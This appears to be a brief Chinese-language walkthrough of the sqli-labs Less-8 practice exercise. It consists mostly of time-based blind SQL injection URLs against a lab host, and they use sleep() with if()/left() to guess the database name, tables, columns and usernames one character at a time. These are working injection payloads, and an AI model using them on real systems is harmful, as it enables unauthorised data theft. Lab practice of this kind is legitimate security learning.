http://192.168.31.164:9002/Less-8/?id=1'
加'
不再显示“you are in”
http://192.168.31.164:9002/Less-8/?id=1'--+
加'--+
显示正常
http://192.168.31.164:9002/Less-8/?id=1' and sleep(5)--+
加入and sleep(5)发现延迟5s说明存在SQL注入漏洞
http://192.168.31.164:9002/Less-8/?id=1' and if(length(database())=8,sleep(3),1)--+
使用if语句if(1,2,3)判断数据库名称的长度,若判断正确则延时3S,否则返回1
http://192.168.31.164:9002/Less-8/?id=1' and if((left(database(),1)='s'),sleep(3),1)--+
根据延时判断数据库的第一个字母,第二个字母…
判断表名:http://192.168.31.164:9002/Less-8/?id=1' and if((left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)='b'),sleep(3),1)--+
判断字段名:http://192.168.31.164:9002/Less-8/?id=1' and if((left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)>'d'),sleep(3),1)--+
判断字段名:http://192.168.31.164:9002/Less-8/?id=1' and if((left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i'),sleep(3),1)--+
判断表的内容:http://192.168.31.164:9002/Less-8/?id=1' and if((left((select username from security.users limit 0,1),1)='d'),sleep(3),1)--+
主要更换limit和left参数逐个猜解内容